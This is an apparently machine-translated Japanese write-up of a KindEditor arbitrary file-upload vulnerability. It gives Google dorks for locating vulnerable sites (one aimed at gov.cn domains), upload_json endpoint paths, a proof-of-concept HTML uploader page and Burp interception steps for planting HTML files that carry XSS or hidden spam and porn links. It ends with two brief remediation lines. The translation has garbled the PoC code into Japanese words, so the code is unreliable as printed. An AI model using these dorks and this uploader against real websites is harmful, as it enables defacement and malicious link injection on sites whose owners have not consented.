Jump to content

0x00脆弱性の説明

Kindeditorエディターには脆弱性が存在します。txtおよび.htmlファイルをアップロードしたり、PHP/ASP/JSP/ASP.NETをサポートしたりすることができます。

ここでは、HTMLはダークリンクアドレスをネストし、XSSをネストできます。 Kindeditorのuploadbutton.htmlは、ファイルアップロード機能ページに使用され、 /upload_json.*?dir=fileに直接投稿し、htm、txtが含まれています。

0x01バッチ検索

Googleでのバッチ検索:

inurl:/examples/uploadbutton.html

inurl:/php/upload_json.php

inurl:/asp.net/upload_json.ashx

inurl: //jsp/upload_json.jsp

inurl: //asp/upload_json.asp

inurl:gov.cn/kindetor/

0x02脆弱性の問題

基本的なスクリプト言語は、さまざまなアップロードアドレスをカスタマイズします。アップロードする前に、ファイルupload_json。*の存在を確認する必要があります。

/asp/upload_json.asp

/asp.net/upload_json.ashx

/jsp/upload_json.jsp

/php/upload_json.php

スクリプトがあるかどうかを確認できます。ディレクトリ変数の脆弱性をアップロード:

Kindeditor/asp/upload_json.asp?dir=file

Kindeditor/asp.net/upload_json.ashx?dir=file

Kindeditor/jsp/upload_json.jsp?dir=file

Kindeditor/Php/upload_json.php?dir=file

0x03脆弱性

Googleは、いくつかの既存のサイトを検索しますinurl:Kindeditor

1.バージョン情報を表示します

http://www.xxx.org/kindetor//kindetor.js

u1d55ggg4ri8451.jpg

2。次のパスが存在する場合は、バージョン4.1.10を試すことができます。 upload_json。*

Kindeditor/asp/upload_json.asp?dir=file

Kindeditor/asp.net/upload_json.ashx?dir=file

Kindeditor/jsp/upload_json.jsp?dir=file

Kindeditor/Php/upload_json.php?dir=file

3。下の図に示すように、JSPアップロードポイント:があることを確認することができます

http://www.xxx.org/kindetor/jsp/upload_json.jsp?dir=file

oabsdyrvek48452.jpg

4. POCをアップロードするために、次の構造を書き留めます。ここでは、スクリプト.スクリプトとURL :の内容を変更し、実際の状況に従って変更する必要があります。

htmlhead

タイトルuploader/タイトル

スクリプトsrc='http://www.xxx.org/dinkeditor //kindeditor.js'/script

スクリプト

Kindeditor.Ready(function(k){

var uploadbutton=k.uploadbutton({

ボタン: K( '#uploadbutton')[0]、

フィールド名: 'imgfile'、

URL : 'http://www.xxx.org/kindetitor/jsp/upload_json.jsp?dir=file'、

Afterupload :関数(データ){

if(data.error===0){

var url=k.formaturl(data.url、 'absolute');

k( '#url')。val(url);}

}、

});

uploadbutton.filebox.change(function(e){

uploadbutton.submit();

});

});

/スクリプト/ヘッドボディ

div class='upload'

input class='ke-input-text' type='text' id='url' value='' readonly='readonly' /

入力型='ボタン' id='uploadbutton' value='upload' /

/div

/体

/HTML

5.ブラウザで開いてから、インターセプトと送信のためにブプストを有効にします。 TXTファイルが正常にアップロードされていることがわかります

f3unqj00rqa8453.png

dcabzq13m4h8454.jpg

vnv4z12ij5y8455.png

6.htmlファイルをアップロードすることもできます。これは、攻撃者が最もアップロードしたいファイルです(ほうれん草やその他のポルノサイトリンクアドレスなど、さまざまなダークページ接続アドレスを含む)

xd1me3h3fft8456.jpg

ndsiinlkuvk8457.jpg

0x04脆弱性修正

1。delete upload_json。*およびfile_manager_json。*直接

2.キンディディターを最新バージョンにアップグレードします

0 Comments

Recommended Comments

There are no comments to display.

Guest
Add a comment...